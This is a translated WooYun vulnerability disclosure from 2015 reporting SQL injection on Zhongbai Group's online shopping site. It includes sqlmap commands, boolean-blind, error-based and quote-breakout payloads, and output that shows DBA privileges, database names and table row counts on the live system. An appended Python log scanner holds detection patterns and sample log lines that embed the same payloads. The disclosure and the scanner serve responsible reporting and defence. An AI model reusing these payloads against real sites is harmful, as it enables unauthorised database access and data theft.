
Vulnerability summary

Defect ID: wooyun-2015-0162392

Title: Bundled SQL injection vulnerabilities in 中百商网 (Zhongbai online mall), a site of 中百控股集团 (Zhongbai Holdings Group)

Vendor: 中百控股集团股份有限公司 (Zhongbai Holdings Group Co., Ltd.)

Author: 逆流冰河

Submitted: 2015-12-19 16:34

Fixed: 2016-02-04 17:47

Published: 2016-02-04 17:47

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-19: Details sent to the vendor; awaiting the vendor's handling
2015-12-23: Vendor has confirmed; details disclosed to the vendor only
2016-01-02: Details disclosed to core white hats and relevant domain experts
2016-01-12: Details disclosed to regular white hats
2016-01-22: Details disclosed to intern white hats
2016-02-04: Details disclosed to the public

Brief description:

中百商网 (Zhongbai online mall) is the shopping website of 中百控股集团股份有限公司 (Zhongbai Holdings Group Co., Ltd.; abbreviated Zhongbai Group; stock code 000759). Zhongbai Group is a large commercial group centred on chain supermarkets and one of the 20 large circulation enterprises designated for key development by the Ministry of Commerce; it has ranked among China's top 500 enterprises for five consecutive years and among the national top 30 retail chain operators for ten consecutive years. The group's four specialised chain companies, 中百仓储, 中百超市, 中百百货 and 中百电器, operate more than 700 outlets covering Hubei Province and Chongqing. It has received numerous honours, including "China Time-honoured Brand", "National Hundred Cities, Ten Thousand Stores No-Counterfeit Demonstration Store", "China Commercial Famous-Brand Enterprise", "National Advanced Unit for the Re-employment Programme", "National Top Ten Units for Professional Ethics", "Outstanding Pilot Enterprise of the National Ten-Thousand Villages, Thousand Townships Market Project", "Best Public Image Company of the China Securities Market Annual Conference", "Outstanding Enterprise of Thirty Years of Reform and Opening-up" and the "National May Day Labour Award". [1]

Detailed description:

0x01
1. The main site is actually done fairly well; I did not find an injection point on it, but a Baidu search turned up one spot. Let's take a look:
sqlmap -u "http://**.**.**.**/gg_com.jsp?bill=42" --batch
2. It became clear right away:
Parameter: bill (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bill=42 AND 6100=6100
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: bill=42 AND 1504=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(98)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (1504=1504) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(120)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
---
web application technology: Tomcat 5.0, JSP, Servlet 2.5
back-end DBMS: Oracle
available databases [8]:
[*] DBAUSERZON100
[*] DBSNMP
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
3. The shopping site's main database turns out to have this many tables:
Database: DBAUSERZON100
[417 tables]
4. Too much is involved here; I'm not going any further.

Proof of vulnerability:

0x02
1. sqlmap -u "http://**.**.**.**/goods/compare.do?id=1100172264-1100172364" --batch
2. PoC:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1100172264-1100172364) AND 5775=5775 AND (8771=8771
---
[20:52:41] [INFO] the back-end DBMS is MySQL
web application technology: Tomcat 5.0, Servlet 2.5
back-end DBMS: MySQL 5
3. DBA privileges:
[14:42:19] [INFO] retrieved:
current user is DBA: True
0x03
1. Injection details:
sqlmap -u "http://**.**.**.**/qyhy/template/mb1/cpxi.jsp?id=80&dlid=16148" --batch
2. Injection point:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=80' AND 7181=7181 AND 'SgeJ'='SgeJ&dlid=16148
---
[14:22:32] [INFO] the back-end DBMS is Oracle
web application technology: Tomcat 5.0, JSP, Servlet 2.5
back-end DBMS: Oracle
available databases [9]:
[*] DBSNMP
[*] NEWB2C
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WHZBEC
[*] WMSYS
3. Table details; let's look only at the ones holding data:
Database: NEWB2C
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| YJW_FJ2EC_PRICE | 886214 |
| TBL_FJ2EC_MAICHANG_GOOD_STOCK | 309576 |
| TBL_FJ2EC_CHG_PRICE | 211184 |
| TBL_FJ2EC_CHG_PRICE_BAK28 | 119025 |
| TBL_FJ2EC_GOOD_BASE | 104577 |
| TBL_FJ2EC_SALES | 33139 |
| SYN_LOG | 30801 |
| TMP_PRICE_YJW | 10047 |
| TBL_FJ2EC_SUPPLIER | 7384 |
| TBL_FJ2EC_POP_PRICE | 5546 |
| TBL_FJ2EC_DACANG_GOOD_STOCK | 2152 |
| TBL_FJ2EC_ALL_REGION | 807 |
| TBL_FJ2EC_FUJI_REGION | 598 |
| TBL_FJ2EC_SYN_INFO | 57 |
| GOODS_MY | 51 |
| SYN_ERRORS_LOG | 4 |
+-------------------------------+---------+

Fix recommendation:

Is this still a small vendor?
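The report leaves remediation to the vendor, so here is a defender-side example, added here and not part of the original report: a Python scanner over Tomcat common-log-format access lines that flags the request shapes visible in the sqlmap output above (non-numeric values on parameters the application treats as integers, `AND n=n` tautologies, single-quote breakouts, and Oracle XMLType/CHR() chains). The integer-parameter set, the log format and the sample log lines are constructed assumptions, not data from the report.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the application treats as integers. Constructed for this example from
# the report's endpoints (bill=42, dlid=16148); in practice, use the app's own schema.
INTEGER_PARAMS = {"bill", "dlid"}

# One pattern per technique visible in the report's sqlmap output.
PATTERNS = [
    ("tautology", re.compile(r"\b(AND|OR)\s+\(?\s*(\d+)\s*=\s*\2\b", re.I)),    # AND 6100=6100
    ("quote-breakout", re.compile(r"'\s*(AND|OR)\s.*'\w+'\s*=\s*'", re.I)),     # ' AND ... 'x'='x
    ("oracle-xmltype", re.compile(r"XMLType\s*\(|CHR\s*\(\d+\)\s*\|\|", re.I)),  # XMLType(CHR(60)||
]

# Tomcat common-log-format access line: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" \d{3} \S+$')

def inspect_request(target):
    """Return (param, reason) findings for one request target (query decoded here)."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # Type check first: any non-digit in an integer parameter is suspect on its own.
        if name in INTEGER_PARAMS and not value.isdigit():
            findings.append((name, "non-numeric value for integer parameter"))
        for label, rx in PATTERNS:
            if rx.search(value):
                findings.append((name, label))
    return findings

def scan_log(lines):
    """Return (client_ip, target, findings) for each parseable line with findings."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (findings := inspect_request(m.group("target"))):
            alerts.append((m.group("ip"), m.group("target"), findings))
    return alerts

# Constructed sample log: documentation-range IPs, report paths, URL-encoded payloads.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Dec/2015:16:01:02 +0800] "GET /gg_com.jsp?bill=42 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [19/Dec/2015:16:01:09 +0800] "GET /goods/compare.do?id=1100172264-1100172364 HTTP/1.1" 200 8841',
    '198.51.100.7 - - [19/Dec/2015:16:20:31 +0800] "GET /gg_com.jsp?bill=42%20AND%206100%3D6100 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [19/Dec/2015:16:20:35 +0800] "GET /qyhy/template/mb1/cpxi.jsp?id=80%27%20AND%207181%3D7181%20AND%20%27SgeJ%27%3D%27SgeJ&dlid=16148 HTTP/1.1" 200 3309',
    '198.51.100.7 - - [19/Dec/2015:16:20:40 +0800] "GET /gg_com.jsp?bill=42%20AND%201504%3D(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)))%20FROM%20DUAL) HTTP/1.1" 500 1187',
]

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, findings)
```

The two benign requests produce no findings; the type check on `bill` fires even when a payload uses syntax none of the patterns know, which is why it runs before the pattern matches.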

Copyright notice: when reposting, please credit the source: 逆流冰河@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-12-23 20:08

Vendor reply:

CNVD confirms the vulnerability as described; a direct handling channel with the website's operating organization has not yet been established, and the report is pending claim.

Latest status:

None yet